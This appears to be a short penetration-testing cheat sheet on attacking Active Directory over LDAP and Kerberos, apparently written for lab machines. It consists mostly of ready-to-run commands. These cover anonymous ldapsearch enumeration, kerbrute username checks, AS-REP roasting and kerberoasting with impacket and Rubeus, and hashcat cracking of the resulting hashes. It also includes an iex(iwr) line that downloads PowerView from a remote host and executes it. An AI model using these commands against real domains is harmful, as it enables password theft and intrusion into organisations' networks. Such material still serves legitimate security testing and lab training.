Kerberos
Kerberos is an authentication mechanism protocol used by LDAP (basically Active Directory) we can test for anonymous LDAP queries binds and enumerate users and can perform other attacks
Anonymous Binds
When LDAP and Kerberos ports are open, it's always a best practice to check for anonymous binds. When anonyomous binds are enabled, we can query information about the users and information about them. Sometimes the sysadmins tend to leave the user's password in their description section which will be a quick win if anonymous binds are enabled
ldapsearch -h $ip -x -s base namingcontexts
ldapsearch -h $ip -x -b "DC=domain,DC=tld" > ldap-anonymous
ldapsearch -h $ip -x -b "DC=domain,DC=tld" '(objectClass=person)' > ldap-people
Machine: Cascade - Here
Kerberos Attacks
ASREPRoasting
Try to enumerate user names as much as possible
With the usernames try to generate the usernames with username-anarchy
Once the valid usernames are obtained try to identify the valid usernames with kerbrute
kerbrute userenum -d domain.tld usernames.txt | tee kerb.out
# users.txt --> the username@domain.tld section from the kerb.out
Once the valid usernames are identified perform
ASREPRoasting
impacket-GetNPUsers -usersfile users.txt domain.tld/ -outputfile getnpusers.txt
With the obtained hash, the password for the user can be obtained by cracking with hashcat / john
hashcat -m 18200 getnpusers.txt /usr/share/wordlists/rockyou.txt
Kerberoasting
From Linux
impacket-GetUserSPN domain.tld/username:password@$ip -dc-ip $ip -outputfile kerberoasting.hash
From Windows
# With powerview
iex(iwr -uri http://10.10.10.29/PowerView.ps1 -usebasicparsing)
Get-NetUser -SPN
# Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoasting.hash
Cracking
hashcat -m 13100 kerberoasting.hash /usr/share/wordlists/rockyou.txt
Last updated
Was this helpful?